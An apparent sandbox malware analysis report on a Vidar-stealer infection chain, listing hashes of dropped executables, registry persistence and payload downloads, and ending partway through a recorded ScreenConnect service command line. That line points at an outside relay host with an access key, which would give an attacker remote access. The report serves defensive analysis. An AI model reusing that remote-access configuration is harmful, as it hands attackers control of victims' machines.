C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-processthreads-l1-1-0.dll
| MD5 | c3632083b312c184cbdd96551fed5519 |
| SHA1 | a93e8e0af42a144009727d2decb337f963a9312e |
| SHA256 | be8d78978d81555554786e08ce474f6af1de96fcb7fa2f1ce4052bc80c6b2125 |
| SHA512 | 8807c2444a044a3c02ef98cf56013285f07c4a1f7014200a21e20fcb995178ba835c30ac3889311e66bc61641d6226b1ff96331b019c83b6fcc7c87870cce8c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-processenvironment-l1-1-0.dll
| MD5 | 0462e22f779295446cd0b63e61142ca5 |
| SHA1 | 616a325cd5b0971821571b880907ce1b181126ae |
| SHA256 | 0b6b598ec28a9e3d646f2bb37e1a57a3dda069a55fba86333727719585b1886e |
| SHA512 | 07b34dca6b3078f7d1e8ede5c639f697c71210dcf9f05212fd16eb181ab4ac62286bc4a7ce0d84832c17f5916d0224d1e8aab210ceeff811fc6724c8845a74fe |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-namedpipe-l1-1-0.dll
| MD5 | 321a3ca50e80795018d55a19bf799197 |
| SHA1 | df2d3c95fb4cbb298d255d342f204121d9d7ef7f |
| SHA256 | 5476db3a4fecf532f96d48f9802c966fdef98ec8d89978a79540cb4db352c15f |
| SHA512 | 3ec20e1ac39a98cb5f726d8390c2ee3cd4cd0bf118fdda7271f7604a4946d78778713b675d19dd3e1ec1d6d4d097abe9cd6d0f76b3a7dff53ce8d6dbc146870a |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-memory-l1-1-0.dll
| MD5 | 3c38aac78b7ce7f94f4916372800e242 |
| SHA1 | c793186bcf8fdb55a1b74568102b4e073f6971d6 |
| SHA256 | 3f81a149ba3862776af307d5c7feef978f258196f0a1bf909da2d3f440ff954d |
| SHA512 | c2746aa4342c6afffbd174819440e1bbf4371a7fed29738801c75b49e2f4f94fd6d013e002bad2aadafbc477171b8332c8c5579d624684ef1afbfde9384b8588 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 724223109e49cb01d61d63a8be926b8f |
| SHA1 | 072a4d01e01dbbab7281d9bd3add76f9a3c8b23b |
| SHA256 | 4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210 |
| SHA512 | 19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-libraryloader-l1-1-0.dll
| MD5 | 1f2a00e72bc8fa2bd887bdb651ed6de5 |
| SHA1 | 04d92e41ce002251cc09c297cf2b38c4263709ea |
| SHA256 | 9c8a08a7d40b6f697a21054770f1afa9ffb197f90ef1eee77c67751df28b7142 |
| SHA512 | 8cf72df019f9fc9cd22ff77c37a563652becee0708ff5c6f1da87317f41037909e64dcbdcc43e890c5777e6bcfa4035a27afc1aeeb0f5deba878e3e9aef7b02a |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-interlocked-l1-1-0.dll
| MD5 | c6024cc04201312f7688a021d25b056d |
| SHA1 | 48a1d01ae8bc90f889fb5f09c0d2a0602ee4b0fd |
| SHA256 | 8751d30df554af08ef42d2faa0a71abcf8c7d17ce9e9ff2ea68a4662603ec500 |
| SHA512 | d86c773416b332945acbb95cbe90e16730ef8e16b7f3ccd459d7131485760c2f07e95951aeb47c1cf29de76affeb1c21bdf6d8260845e32205fe8411ed5efa47 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-heap-l1-1-0.dll
| MD5 | accc640d1b06fb8552fe02f823126ff5 |
| SHA1 | 82ccc763d62660bfa8b8a09e566120d469f6ab67 |
| SHA256 | 332ba469ae84aa72ec8cce2b33781db1ab81a42ece5863f7a3cb5a990059594f |
| SHA512 | 6382302fb7158fc9f2be790811e5c459c5c441f8caee63df1e09b203b8077a27e023c4c01957b252ac8ac288f8310bcee5b4dcc1f7fc691458b90cdfaa36dcbe |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-handle-l1-1-0.dll
| MD5 | e89cdcd4d95cda04e4abba8193a5b492 |
| SHA1 | 5c0aee81f32d7f9ec9f0650239ee58880c9b0337 |
| SHA256 | 1a489e0606484bd71a0d9cb37a1dc6ca8437777b3d67bfc8c0075d0cc59e6238 |
| SHA512 | 55d01e68c8c899e99a3c62c2c36d6bcb1a66ff6ecd2636d2d0157409a1f53a84ce5d6f0c703d5ed47f8e9e2d1c9d2d87cc52585ee624a23d92183062c999b97e |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-file-l2-1-0.dll
| MD5 | bfffa7117fd9b1622c66d949bac3f1d7 |
| SHA1 | 402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2 |
| SHA256 | 1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e |
| SHA512 | b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-file-l1-2-0.dll
| MD5 | 1c58526d681efe507deb8f1935c75487 |
| SHA1 | 0e6d328faf3563f2aae029bc5f2272fb7a742672 |
| SHA256 | ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2 |
| SHA512 | 8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-file-l1-1-0.dll
| MD5 | efad0ee0136532e8e8402770a64c71f9 |
| SHA1 | cda3774fe9781400792d8605869f4e6b08153e55 |
| SHA256 | 3d2c55902385381869db850b526261ddeb4628b83e690a32b67d2e0936b2c6ed |
| SHA512 | 69d25edf0f4c8ac5d77cb5815dfb53eac7f403dc8d11bfe336a545c19a19ffde1031fa59019507d119e4570da0d79b95351eac697f46024b4e558a0ff6349852 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-errorhandling-l1-1-0.dll
| MD5 | eb0978a9213e7f6fdd63b2967f02d999 |
| SHA1 | 9833f4134f7ac4766991c918aece900acfbf969f |
| SHA256 | ab25a1fe836fc68bcb199f1fe565c27d26af0c390a38da158e0d8815efe1103e |
| SHA512 | 6f268148f959693ee213db7d3db136b8e3ad1f80267d8cbd7d5429c021adaccc9c14424c09d527e181b9c9b5ea41765aff568b9630e4eb83bfc532e56dfe5b63 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-debug-l1-1-0.dll
| MD5 | 33bbece432f8da57f17bf2e396ebaa58 |
| SHA1 | 890df2dddfdf3eeccc698312d32407f3e2ec7eb1 |
| SHA256 | 7cf0944901f7f7e0d0b9ad62753fc2fe380461b1cce8cdc7e9c9867c980e3b0e |
| SHA512 | 619b684e83546d97fc1d1bc7181ad09c083e880629726ee3af138a9e4791a6dcf675a8df65dc20edbe6465b5f4eac92a64265df37e53a5f34f6be93a5c2a7ae5 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-datetime-l1-1-0.dll
| MD5 | cfe0c1dfde224ea5fed9bd5ff778a6e0 |
| SHA1 | 5150e7edd1293e29d2e4d6bb68067374b8a07ce6 |
| SHA256 | 0d0f80cbf476af5b1c9fd3775e086ed0dfdb510cd0cc208ec1ccb04572396e3e |
| SHA512 | b0e02e1f19cfa7de3693d4d63e404bdb9d15527ac85a6d492db1128bb695bffd11bec33d32f317a7615cb9a820cd14f9f8b182469d65af2430ffcdbad4bd7000 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\api-ms-win-core-console-l1-1-0.dll
| MD5 | e8b9d74bfd1f6d1cc1d99b24f44da796 |
| SHA1 | a312cfc6a7ed7bf1b786e5b3fd842a7eeb683452 |
| SHA256 | b1b3fd40ab437a43c8db4994ccffc7f88000cc8bb6e34a2bcbff8e2464930c59 |
| SHA512 | b74d9b12b69db81a96fc5a001fd88c1e62ee8299ba435e242c5cb2ce446740ed3d8a623e1924c2bc07bfd9aef7b2577c9ec8264e53e5be625f4379119bafcc27 |
C:\Users\Admin\AppData\Local\Temp\_MEI31962\_ctypes.pyd
| MD5 | 79f339753dc8954b8eb45fe70910937e |
| SHA1 | 3ad1bf9872dc779f32795988eb85c81fe47b3dd4 |
| SHA256 | 35cdd122679041ebef264de5626b7805f3f66c8ae6cc451b8bc520be647fa007 |
| SHA512 | 21e567e813180ed0480c4b21be3e2e67974d8d787e663275be054cee0a3f5161fc39034704dbd25f1412feb021d6a21b300a32d1747dee072820be81b9d9b753 |
C:\Users\Admin\AppData\Local\Temp\current_version_DiscordSpotifyBypass.txt
| MD5 | cb5ae17636e975f9bf71ddf5bc542075 |
| SHA1 | 180505679cfe0cca79bae51fdda0296b7cd9c493 |
| SHA256 | 14be4b45f18e0d8c67b4f719b5144eee88497e413709d11d85b096d8e2346310 |
| SHA512 | 957f720b6d516c8e273968c9be2ffbe146329c1a11a2097844206f030dfde1f4efe3379eb68316d1c7426457144d9576dad04e46b10c0ca8d8b9a5d668387a1b |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_decimal.pyd
| MD5 | 1cdd7239fc63b7c8a2e2bc0a08d9ea76 |
| SHA1 | 85ef6f43ba1343b30a223c48442a8b4f5254d5b0 |
| SHA256 | 384993b2b8cfcbf155e63f0ee2383a9f9483de92ab73736ff84590a0c4ca2690 |
| SHA512 | ba4e19e122f83d477cc4be5e0dea184dafba2f438a587dd4f0ef038abd40cb9cdc1986ee69c34bac3af9cf2347bea137feea3b82e02cca1a7720d735cea7acda |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\psutil\_psutil_windows.pyd
| MD5 | 3e579844160de8322d574501a0f91516 |
| SHA1 | c8de193854f7fc94f103bd4ac726246981264508 |
| SHA256 | 95f01ce7e37f6b4b281dbc76e9b88f28a03cb02d41383cc986803275a1cd6333 |
| SHA512 | ee2a026e8e70351d395329c78a07acb1b9440261d2557f639e817a8149ba625173ef196aed3d1c986577d78dc1a7ec9fed759c19346c51511474fe6d235b1817 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\charset_normalizer\md__mypyc.cp310-win_amd64.pyd
| MD5 | 494f5b9adc1cfb7fdb919c9b1af346e1 |
| SHA1 | 4a5fddd47812d19948585390f76d5435c4220e6b |
| SHA256 | ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051 |
| SHA512 | 2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\charset_normalizer\md.cp310-win_amd64.pyd
| MD5 | f33ca57d413e6b5313272fa54dbc8baa |
| SHA1 | 4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44 |
| SHA256 | 9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664 |
| SHA512 | f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\unicodedata.pyd
| MD5 | a40ff441b1b612b3b9f30f28fa3c680d |
| SHA1 | 42a309992bdbb68004e2b6b60b450e964276a8fc |
| SHA256 | 9b22d93f4db077a70a1d85ffc503980903f1a88e262068dd79c6190ec7a31b08 |
| SHA512 | 5f9142b16ed7ffc0e5b17d6a4257d7249a21061fe5e928d3cde75265c2b87b723b2e7bd3109c30d2c8f83913134445e8672c98c187073368c244a476ac46c3ef |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_ssl.pyd
| MD5 | 11c5008e0ba2caa8adf7452f0aaafd1e |
| SHA1 | 764b33b749e3da9e716b8a853b63b2f7711fcc7c |
| SHA256 | bf63f44951f14c9d0c890415d013276498d6d59e53811bbe2fa16825710bea14 |
| SHA512 | fceb022d8694bce6504d6b64de4596e2b8252fc2427ee66300e37bcff297579cc7d32a8cb8f847408eaa716cb053e20d53e93fbd945e3f60d58214e6a969c9dd |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_socket.pyd
| MD5 | 5dd51579fa9b6a06336854889562bec0 |
| SHA1 | 99c0ed0a15ed450279b01d95b75c162628c9be1d |
| SHA256 | 3669e56e99ae3a944fbe7845f0be05aea96a603717e883d56a27dc356f8c2f2c |
| SHA512 | 7aa6c6587890ae8c3f9a5e97ebde689243ac5b9abb9b1e887f29c53eef99a53e4b4ec100c03e1c043e2f0d330e7af444c3ca886c9a5e338c2ea42aaacae09f3e |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_queue.pyd
| MD5 | c9ee37e9f3bffd296ade10a27c7e5b50 |
| SHA1 | b7eee121b2918b6c0997d4889cff13025af4f676 |
| SHA256 | 9ecec72c5fe3c83c122043cad8ceb80d239d99d03b8ea665490bbced183ce42a |
| SHA512 | c63bb1b5d84d027439af29c4827fa801df3a2f3d5854c7c79789cad3f5f7561eb2a7406c6f599d2ac553bc31969dc3fa9eef8648bed7282fbc5dc3fb3ba4307f |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_lzma.pyd
| MD5 | 5a77a1e70e054431236adb9e46f40582 |
| SHA1 | be4a8d1618d3ad11cfdb6a366625b37c27f4611a |
| SHA256 | f125a885c10e1be4b12d988d6c19128890e7add75baa935fe1354721aa2dea3e |
| SHA512 | 3c14297a1400a93d1a01c7f8b4463bfd6be062ec08daaf5eb7fcbcde7f4fa40ae06e016ff0de16cb03b987c263876f2f437705adc66244d3ee58f23d6bf7f635 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_hashlib.pyd
| MD5 | cfb9e0a73a6c9d6d35c2594e52e15234 |
| SHA1 | b86042c96f2ce6d8a239b7d426f298a23df8b3b9 |
| SHA256 | 50daeb3985302a8d85ce8167b0bf08b9da43e7d51ceae50e8e1cdfb0edf218c6 |
| SHA512 | 22a5fd139d88c0eee7241c5597d8dbbf2b78841565d0ed0df62383ab50fde04b13a203bddef03530f8609f5117869ed06894a572f7655224285823385d7492d2 |
C:\Users\Admin\AppData\Local\Temp\_MEI71442\_bz2.pyd
| MD5 | b45e82a398713163216984f2feba88f6 |
| SHA1 | eaaf4b91db6f67d7c57c2711f4e968ce0fe5d839 |
| SHA256 | 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8 |
| SHA512 | b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 8036a5d811a46670fc2d9ed64ec406c9 |
| SHA1 | 4eb265fbe3db4b82431855f85e03951ec51f2c0f |
| SHA256 | e6f2de7acb31fba46cd82dad80f7e2a76bf19a661959928a329823f7a4a9a53a |
| SHA512 | a852a2b0c6f03abee03c298e81f5880bfa7c772bddeb212a0475834e03b0f1e606daac0a1b6a0c887dfba1c44e2bab272e182ed99321348da1ef601d29e65d50 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | c9fbeaf71d2bc92e74529a3ff6e031b0 |
| SHA1 | 0bbf4957ed2bd4d99d3cea7d8be771cfa13c2d01 |
| SHA256 | 907ba3f9f59c0adc50673d3875d33b15b9b17a8a5b7749202fda496bf9845159 |
| SHA512 | 6da682b206b91848b09068a16928ecb4f0d1d5946c5cf7a969db1f880cf169f58427d557a4d10bbe6c7fd409e9d2b06d2ceeebfd7a56ee5a52eb522b22f043d6 |
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe
| MD5 | 8123d15bb6100a19ac103b4ec3d592bf |
| SHA1 | 713d2344beb28d34864768e7b2c0463044bdc014 |
| SHA256 | 68e92585378abdd8a5e6ba42c20a66558ebbcc964c08ba3ce56d020568ebf16d |
| SHA512 | ca048fc1aa53af7b517c2b894e038ed7e413690f2a9e9838c0a5624f9530b20ec8ca22c8d99b8b7ed1e049753970880ee047de984557e2e6c28a55ba2c974351 |
memory/5504-3707-0x0000000000B80000-0x0000000000B92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
| MD5 | a6fed209276015af14b2f088d52282af |
| SHA1 | 7ee00d72c43b4f6720340637b2773e88664a1b70 |
| SHA256 | c7ddec717bda7e1ef135d2815a795df62157cd14f1ac45c44c91868ae72c80d4 |
| SHA512 | b7f0d9279c556e58063ee768c078fec87993596463f5006fd7510527a49b3d598584ebaf6d9894340313d46961cbfbb09a0c7ed9c86c5d7348a791d4f5817f9a |
C:\Users\Admin\AppData\Local\Temp\Files\CISNSATEST.exe
| MD5 | ab95efbeb890f50d89b56a14f2c0bbd1 |
| SHA1 | a90b055e0cfafb31b75bb2be8cac9a07f1c06088 |
| SHA256 | e473233c71a8855f9d52fe131830b56d0b5ea9b6eeb0e2d5528cbef29360668f |
| SHA512 | b553e90455a4ad9f3e64d9b08ac4a71d99eb2386cd1ec2e2937fe52317c5e6de3794c471a52d1bd400e01277583807563b630cfbcb4ad2792111847eaa81f919 |
C:\Users\Admin\AppData\Local\Temp\Files\heo.exe
| MD5 | feaca07182c6be327551ba4402a338c7 |
| SHA1 | 5c699eb735def4473b9b02de282ccead84af1061 |
| SHA256 | 26e9813dd9d80e2b2441d799608214697d7262e24c739bcc11563756c22d3efc |
| SHA512 | 0ada77bc81af9b5d865f06cd6f91457281bdebbf07183367b7d3d0bd598ad7d3ce081b0d1f0741efbbe6c3839620bb17b637ff9727cb3440d5b96b3eab70dda1 |
C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe
| MD5 | 1b3e9c59f9c7a134ec630ada1eb76a39 |
| SHA1 | a7e831d392e99f3d37847dcc561dd2e017065439 |
| SHA256 | ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae |
| SHA512 | c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e |
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{61A04984-23EA-4E4E-BD59-4D8A0896B915}\EDGEMITMP_D472E.tmp\SETUP.EX_
| MD5 | 1a59a8af3c58b30ff0fe71db2196b24b |
| SHA1 | 6b0e5ba36f4fc5328ec494272054a50cafa13e68 |
| SHA256 | ba25974b29a25cb7bc1f58a0990a8ce758354aa6ec5b8b8af210f2c1466ba49d |
| SHA512 | f173fe15db8d7aeef4f6fa62a41246550ccee207e6388095a5f87036362d4c95da646e1a7c68764054556e024da80b749646425076e9bfac42fb77be8f2c0355 |
C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe
| MD5 | 30a39343008efbab70b632c274e6f7e2 |
| SHA1 | 566b9693a3aa39b17f34c02cffdf906e64778932 |
| SHA256 | 5d1a98b024843417664b60641064995335e2ea31220124723908f59e926dab06 |
| SHA512 | 1d4047fed9c6a48840a587fe2a4586a34e00f03dc64ae31e0c2345f52283205fc9165d6ec15d6e6c81032a5948065ba6047f4785c5a0666aea1fe417202084f3 |
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
| MD5 | f48972736d07992d0cfd2b8bc7972e27 |
| SHA1 | 017d47686c76c1846da04992909214651972905f |
| SHA256 | 56d97e9f42ee5b7efdbfcd7d56da50e752fb08599f3422ee0cc9b697a92e56da |
| SHA512 | 1bac6e0f66104bd66505647c845b4b2eac918fb5986004325417dc3f9bcb20be39965bbca6781244e009966b49ea2e78989ca69a5c49f26c656fc8c0399ba345 |
C:\Users\Admin\AppData\Local\Temp\Files\VPN-Installer.exe
| MD5 | ec2890a2d11d0b67f873821d6b83fca3 |
| SHA1 | 8e21eee3a1b154a3f2ca55f2075b3c33dce7a294 |
| SHA256 | 3d7e660d66413479c2addd32a9e96691452b5d3cac5c5e9ef487bd18ad48739f |
| SHA512 | 2f18ab9c642b6aa13a39a2223980d544e2a549ae3feeaa09a61cea3a5812a81ac504c883b97947d9c84574788b182c0aa899e9524711f91692b714c47ab20197 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-14 01:10
Reported
2025-02-14 01:55
Platform
win11-20250210-en
Max time kernel
1800s
Max time network
1801s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\ = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\StubPath = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\133.0.3065.59\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Localized Name = "Microsoft Edge" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\IsInstalled = "1" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\Version = "43,0,0,0" | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{9459C573-B17A-45AE-9F64-1857B5D58CEE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{77BEDA41-7D52-4721-8930-2E1ACD91DCB9}\EDGEMITMP_39C84.tmp\setup.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e9736d81e38965d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (e9736d81e38965d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4L
